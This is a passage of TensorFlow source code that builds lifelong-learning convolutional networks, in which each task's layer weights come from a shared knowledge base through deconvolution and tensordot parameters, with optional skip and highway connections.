para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [1, k_size[0], k_size[1], TS_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
para_tmp = tf.reshape(para_tmp, [k_size[0], k_size[1], TS_size[1]])
if para_activation_fn is not None:
para_tmp = para_activation_fn(para_tmp)
W = tf.tensordot(para_tmp, TS_param[2], [[2], [0]])
b = TS_param[3]
## HighwayNet's skip connection
highway_params, gate = [], None
if highway_connect_type > 0:
with tf.name_scope('highway_connection'):
if highway_connect_type == 1:
x = layer_input
if highway_W is None:
highway_W = new_weight([k_size[0], k_size[1], ch_size[0], ch_size[1]])
if highway_b is None:
highway_b = new_bias([ch_size[1]], init_val=-2.0)
gate, _ = new_cnn_layer(x, k_size+ch_size, stride_size=stride_size, activation_fn=None, weight=highway_W, bias=highway_b, padding_type=padding_type, max_pooling=False)
elif highway_connect_type == 2:
x = tf.reshape(layer_input, [-1, int(layer_input.shape[1]*layer_input.shape[2]*layer_input.shape[3])])
if highway_W is None:
highway_W = new_weight([int(x.shape[1]), 1])
if highway_b is None:
highway_b = new_bias([1], init_val=-2.0)
gate = tf.broadcast_to(tf.stack([tf.stack([tf.matmul(x, highway_W) + highway_b], axis=2)], axis=3), layer_input.get_shape())
gate = tf.nn.sigmoid(gate)
highway_params = [highway_W, highway_b]
layer_eqn, _ = new_cnn_layer(layer_input, k_size+ch_size, stride_size=stride_size, activation_fn=activation_fn, weight=W, bias=b, padding_type=padding_type, max_pooling=max_pool, pool_size=pool_size, skip_connect_input=skip_connect_input, highway_connect_type=highway_connect_type, highway_gate=gate)
return layer_eqn, [KB_param], TS_param, [W, b], highway_params
#### function to generate network of convolutional layers with shared knowledge base
def new_ELLA_cnn_deconv_tensordot_net(net_input, k_sizes, ch_sizes, stride_sizes, KB_sizes, TS_sizes, TS_stride_sizes, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_params=None, TS_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, input_size=[0, 0], task_index=0, skip_connections=[]):
_num_TS_param_per_layer = 4
## first element : make new KB&TS / second element : make new TS / third element : not make new para / fourth element : make new KB
control_flag = [(KB_params is None and TS_params is None), (not (KB_params is None) and (TS_params is None)), not (KB_params is None or TS_params is None), ((KB_params is None) and not (TS_params is None))]
if control_flag[1]:
TS_params = []
elif control_flag[3]:
KB_params = []
elif control_flag[0]:
KB_params, TS_params = [], []
cnn_gen_params = []
layers_for_skip, next_skip_connect = [net_input], None
with tf.name_scope('ELLA_cdnn_net'):
layers = []
for layer_cnt in range(len(k_sizes)//2):
next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
if next_skip_connect is not None:
skip_connect_in, skip_connect_out = next_skip_connect
assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
else:
skip_connect_in, skip_connect_out = -1, -1
if layer_cnt == skip_connect_out:
processed_skip_connect_input = layers_for_skip[skip_connect_in]
for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
else:
processed_skip_connect_input = None
if layer_cnt == 0 and control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[1]:
layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[2]:
layer_tmp, _, _, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[3]:
layer_tmp, KB_para_tmp, _, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[1]:
layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[2]:
layer_tmp, _, _, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[3]:
layer_tmp, KB_para_tmp, _, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
layers.append(layer_tmp)
layers_for_skip.append(layer_tmp)
cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
if control_flag[1]:
TS_params = TS_params + TS_para_tmp
elif control_flag[3]:
KB_params = KB_params + KB_para_tmp
elif control_flag[0]:
KB_params = KB_params + KB_para_tmp
TS_params = TS_params + TS_para_tmp
if layer_cnt == skip_connect_out:
next_skip_connect = None
#### flattening output
if flat_output:
output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
else:
output_dim = layers[-1].shape[1:]
#### add dropout layer
if dropout:
layers.append(tf.nn.dropout(layers[-1], dropout_prob))
return (layers, KB_params, TS_params, cnn_gen_params, output_dim)
#### function to generate network of cnn (with shared KB through deconv)-> simple ffnn
def new_ELLA_cnn_deconv_tensordot_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[]):
## add CNN layers
cnn_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, cnn_output_dim = new_ELLA_cnn_deconv_tensordot_net(net_input, k_sizes, ch_sizes, stride_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_params=cnn_KB_params, TS_params=cnn_TS_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, input_size=input_size, task_index=task_index, skip_connections=skip_connections)
## add fc layers
#fc_model, fc_params = new_fc_net(cnn_model[-1], [cnn_output_dim[0]]+fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
fc_model, fc_params = new_fc_net(cnn_model[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
return (cnn_model+fc_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, fc_params)
###########################################################################
##### functions for adding ELLA network (CNN/Deconv & Tensordot ver2) #####
###########################################################################
#### KB_size : [filter_height(and width), num_of_channel0, num_of_channel1]
#### TS_size : [deconv_filter_height(and width), deconv_filter_channel]
#### TS_stride_size : [stride_in_height, stride_in_width]
def new_ELLA_cnn_deconv_tensordot_layer2(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_size=None, skip_connect_input=None):
assert (k_size[0] == k_size[1] and k_size[0] == (KB_size[0]-1)*TS_stride_size[0]+1), "CNN kernel size does not match the output size of Deconv from KB"
with tf.name_scope('ELLA_cdnn_KB'):
if KB_param is None:
## KB \in R^{d \times h \times w \times c}
KB_param = new_ELLA_KB_param([KB_size[1], KB_size[0], KB_size[0], KB_size[2]], layer_num, task_num, KB_reg_type)
if TS_param is None:
## TS1 : Deconv W \in R^{h \times w \times kb_c_out \times c}
## TS2 : Deconv bias \in R^{kb_c_out}
## TS3 : tensor W \in R^{d \times ch_in}
## TS4 : tensor W \in R^{kb_c_out \times ch_out}
## TS5 : Conv bias \in R^{ch_out}
TS_param = new_ELLA_cnn_deconv_tensordot_TS_param2([[TS_size[0], TS_size[0], TS_size[1], KB_size[2]], [1, 1, 1, TS_size[1]], [KB_size[1], ch_size[0]], [TS_size[1], ch_size[1]], [1, 1, 1, ch_size[1]]], layer_num, task_num, TS_reg_type)
with tf.name_scope('ELLA_cdnn_TS'):
para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [KB_size[1], k_size[0], k_size[1], TS_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
if para_activation_fn is not None:
para_tmp = para_activation_fn(para_tmp)
para_tmp = tf.tensordot(para_tmp, TS_param[2], [[0], [0]])
W = tf.tensordot(para_tmp, TS_param[3], [[2], [0]])
b = TS_param[4]
layer_eqn, _ = new_cnn_layer(layer_input, k_size+ch_size, stride_size=stride_size, activation_fn=activation_fn, weight=W, bias=b, padding_type=padding_type, max_pooling=max_pool, pool_size=pool_size, skip_connect_input=skip_connect_input)
return layer_eqn, [KB_param], TS_param, [W, b]
#### function to generate network of convolutional layers with shared knowledge base
def new_ELLA_cnn_deconv_tensordot_net2(net_input, k_sizes, ch_sizes, stride_sizes, KB_sizes, TS_sizes, TS_stride_sizes, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_params=None, TS_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, input_size=[0, 0], task_index=0, skip_connections=[]):
_num_TS_param_per_layer = 5
## first element : make new KB&TS / second element : make new TS / third element : not make new para / fourth element : make new KB
control_flag = [(KB_params is None and TS_params is None), (not (KB_params is None) and (TS_params is None)), not (KB_params is None or TS_params is None), ((KB_params is None) and not (TS_params is None))]
if control_flag[1]:
TS_params = []
elif control_flag[3]:
KB_params = []
elif control_flag[0]:
KB_params, TS_params = [], []
cnn_gen_params = []
layers_for_skip, next_skip_connect = [net_input], None
with tf.name_scope('ELLA_cdnn_net'):
layers = []
for layer_cnt in range(len(k_sizes)//2):
next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
if next_skip_connect is not None:
skip_connect_in, skip_connect_out = next_skip_connect
assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
else:
skip_connect_in, skip_connect_out = -1, -1
if layer_cnt == skip_connect_out:
processed_skip_connect_input = layers_for_skip[skip_connect_in]
for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
else:
processed_skip_connect_input = None
if layer_cnt == 0 and control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[1]:
layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[2]:
layer_tmp, _, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[3]:
layer_tmp, KB_para_tmp, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[1]:
layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[2]:
layer_tmp, _, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[3]:
layer_tmp, KB_para_tmp, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
layers.append(layer_tmp)
layers_for_skip.append(layer_tmp)
cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
if control_flag[1]:
TS_params = TS_params + TS_para_tmp
elif control_flag[3]:
KB_params = KB_params + KB_para_tmp
elif control_flag[0]:
KB_params = KB_params + KB_para_tmp
TS_params = TS_params + TS_para_tmp
if layer_cnt == skip_connect_out:
next_skip_connect = None
#### flattening output
if flat_output:
output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
else:
output_dim = layers[-1].shape[1:]
#### add dropout layer
if dropout:
layers.append(tf.nn.dropout(layers[-1], dropout_prob))
return (layers, KB_params, TS_params, cnn_gen_params, output_dim)
#### function to generate network of cnn (with shared KB through deconv)-> simple ffnn
def new_ELLA_cnn_deconv_tensordot_fc_net2(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[]):
## add CNN layers
cnn_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, cnn_output_dim = new_ELLA_cnn_deconv_tensordot_net2(net_input, k_sizes, ch_sizes, stride_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_params=cnn_KB_params, TS_params=cnn_TS_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, input_size=input_size, task_index=task_index, skip_connections=skip_connections)
## add fc layers
#fc_model, fc_params = new_fc_net(cnn_model[-1], [cnn_output_dim[0]]+fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
fc_model, fc_params = new_fc_net(cnn_model[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
return (cnn_model+fc_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, fc_params)
##############################################################################################################
#### functions for Conv-FC nets whose conv layers are freely set to shared across tasks by DeconvFactor ####
##############################################################################################################
def new_ELLA_flexible_cnn_deconv_tensordot_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_sharing, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, cnn_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[], highway_connect_type=0, cnn_highway_params=None, trainable=True, trainable_KB=True):
_num_TS_param_per_layer = 4
num_conv_layers = [len(k_sizes)//2, len(ch_sizes)-1, len(stride_sizes)//2, len(cnn_sharing), len(cnn_KB_sizes)//2, len(cnn_TS_sizes)//2, len(cnn_TS_stride_sizes)//2]
assert (all([(num_conv_layers[i]==num_conv_layers[i+1]) for i in range(len(num_conv_layers)-1)])), "Parameters related to conv layers are wrong!"
num_conv_layers = num_conv_layers[0]
'''
if cnn_KB_params is not None:
assert (len(cnn_KB_params) == 1), "Given init value of KB (last layer) is wrong!"
if cnn_TS_params is not None:
assert (len(cnn_TS_params) == 4), "Given init value of TS (last layer) is wrong!"
'''
## add CNN layers
## first element : make new KB&TS / second element : make new TS / third element : not make new para / fourth element : make new KB
control_flag = [(cnn_KB_params is None and cnn_TS_params is None), (not (cnn_KB_params is None) and (cnn_TS_params is None)), not (cnn_KB_params is None or cnn_TS_params is None), ((cnn_KB_params is None) and not (cnn_TS_params is None))]
if control_flag[1]:
cnn_TS_params = []
elif control_flag[3]:
cnn_KB_params = []
elif control_flag[0]:
cnn_KB_params, cnn_TS_params = [], []
cnn_gen_params = []
if cnn_params is None:
cnn_params = [None for _ in range(2*num_conv_layers)]
layers_for_skip, next_skip_connect = [net_input], None
with tf.name_scope('Hybrid_DFCNN'):
cnn_model, cnn_params_to_return, cnn_highway_params_to_return = [], [], []
cnn_KB_to_return, cnn_TS_to_return = [], []
for layer_cnt in range(num_conv_layers):
KB_para_tmp, TS_para_tmp, para_tmp = [None], [None for _ in range(_num_TS_param_per_layer)], [None, None]
highway_para_tmp = [None, None] if cnn_highway_params is None else cnn_highway_params[2*layer_cnt:2*(layer_cnt+1)]
cnn_gen_para_tmp = [None, None]
next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
if next_skip_connect is not None:
